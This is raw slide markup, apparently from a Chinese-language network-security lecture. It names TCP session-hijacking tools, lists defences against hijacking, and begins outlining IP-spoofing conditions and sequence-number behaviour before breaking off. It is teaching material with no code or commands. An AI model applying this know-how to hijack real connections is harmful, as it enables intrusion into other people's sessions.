              <a:off x="2208" y="2928"/>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电力</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5231" name="Text Box 111"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2784" y="3120"/>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交通</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5232" name="Text Box 112"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2112" y="2016"/>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通讯</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5233" name="Text Box 113"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3072" y="1488"/>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控制</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5234" name="Text Box 114"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3792" y="1392"/>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广播</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5235" name="Text Box 115"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5184" y="1680"/>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工业</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5236" name="Text Box 116"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4944" y="2880"/>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金融</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5237" name="Text Box 117"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4128" y="3312"/>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A50021"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>医疗</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5238" name="AutoShape 118"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="12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39" name="AutoShape 119"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="12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0" name="AutoShape 120"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="139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1" name="AutoShape 121"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="148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 name="AutoShape 122"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="158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 name="AutoShape 123"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="168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 name="AutoShape 124"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="182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5" name="AutoShape 125"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="192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6" name="AutoShape 126"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="201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7" name="AutoShape 127"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="211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8" name="AutoShape 128"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="12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9" name="AutoShape 129"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="12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0" name="AutoShape 130"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="139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1" name="AutoShape 131"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="148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2" name="AutoShape 132"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="158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3" name="AutoShape 133"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="168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4" name="AutoShape 134"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="182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5" name="AutoShape 135"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="192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6" name="AutoShape 136"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="201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7" name="AutoShape 137"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="211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8" name="AutoShape 138"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="220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59" name="AutoShape 139"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="230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0" name="AutoShape 140"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="12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1" name="AutoShape 141"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="12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2" name="AutoShape 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="139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 name="AutoShape 143"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="148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4" name="AutoShape 144"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="158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5" name="AutoShape 145"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="168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6" name="AutoShape 146"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="182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7" name="AutoShape 147"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="192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8" name="AutoShape 148"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="201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9" name="AutoShape 149"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="211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0" name="AutoShape 150"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="220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1" name="AutoShape 151"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="230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2" name="AutoShape 152"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="24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 name="AutoShape 153"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="24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 name="AutoShape 154"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="12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5" name="AutoShape 155"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="12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6" name="AutoShape 156"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="139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7" name="AutoShape 157"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="158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8" name="AutoShape 158"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="168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9" name="AutoShape 159"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="182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0" name="AutoShape 160"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="192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1" name="AutoShape 161"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="201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2" name="AutoShape 162"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="211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3" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2208"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4" name="AutoShape 164"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2304"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5" name="AutoShape 165"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2400"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6" name="AutoShape 166"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="249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7" name="Oval 167"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3470" y="1706"/>
              <a:ext cx="336" cy="432"/>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8" name="AutoShape 168"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2592"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9" name="AutoShape 169"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2736" y="2592"/>
              <a:ext cx="240" cy="192"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 31250"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent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90" name="Object 170"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="3470" y="1389"/>
            <a:ext cx="296" cy="528"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s632299" name="剪贴画" r:id="rId17" imgW="1776730" imgH="3170555" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="剪贴画" r:id="rId17" imgW="1776730" imgH="3170555" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture 16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0" y="1389"/>
                          <a:ext cx="296"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slow">
    <p:pull/>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411" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Juggernaut</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会话攻击的网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sniffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>程序</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Hunt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US"/>
              <a:t>功能与</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN"/>
              <a:t>Juggernaut</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US"/>
              <a:t>类似</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN"/>
              <a:t>TTY Watcher</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US"/>
              <a:t>免费程序，针对单一主机上的连接</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN"/>
              <a:t>IP Watcher</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US"/>
              <a:t>商用的会话劫持工具</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US"/>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88C370E1-BA90-457C-AFE1-7F0901A18E82}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273410" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进行会话劫持的工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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70339" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用交换机代替集线器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会话加密</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防火墙配置</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>限制尽可能少量的外部许可连接的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>检测</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包的数量明显增加</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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F489D619-4F5E-4619-B999-2F3DA2B11CB5}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270338" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如何防止会话劫持</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033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03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03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7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utoUpdateAnimBg="0" build="p"/>
    </p:bld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内容占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>大量通信都基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>连接，单纯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗攻击层次低，难以发挥作用，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>条件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>1.A——B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>相互信任，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>冒充</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>2.ISN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的设置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>主机，维持初始序列号计数器，随时间累加（每秒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>+128000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>），每次连接增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
